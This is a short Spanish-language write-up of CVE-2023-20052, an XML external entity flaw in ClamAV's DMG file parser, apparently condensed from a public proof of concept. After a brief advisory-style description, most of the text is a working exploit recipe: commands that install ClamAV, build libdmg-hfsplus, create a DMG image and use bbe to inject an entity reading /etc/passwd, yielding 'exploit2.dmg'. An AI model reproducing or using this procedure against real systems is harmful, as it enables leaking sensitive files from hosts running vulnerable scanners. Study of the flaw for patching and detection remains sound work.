
vulnerabilidad de fuga de información CVE-2023-20052 en el analizador de archivos DMG de ClamAV
Vulnerabilidad de fuga de información CVE-2023-20052 en el analizador de archivos DMG de ClamAV
Una vulnerabilidad en el analizador de archivos DMG de ClamAV versiones 1.0.0 y anteriores, 0.105.1 y anteriores, y 0.103.7 y anteriores podría permitir que un atacante remoto no autenticado acceda a información sensible en un dispositivo afectado. Esta vulnerabilidad se debe a la habilitación de la sustitución de entidades XML que puede resultar en la inyección de entidades externas XML. Un atacante podría explotar esta vulnerabilidad enviando un archivo DMG manipulado para ser escaneado por ClamAV en un dispositivo afectado. Una explotación exitosa podría permitir al atacante filtrar bytes de cualquier archivo que pueda ser leído por el proceso de escaneo de ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg


Referencia: https://github.com/nokn0wthing/CVE-2023-20052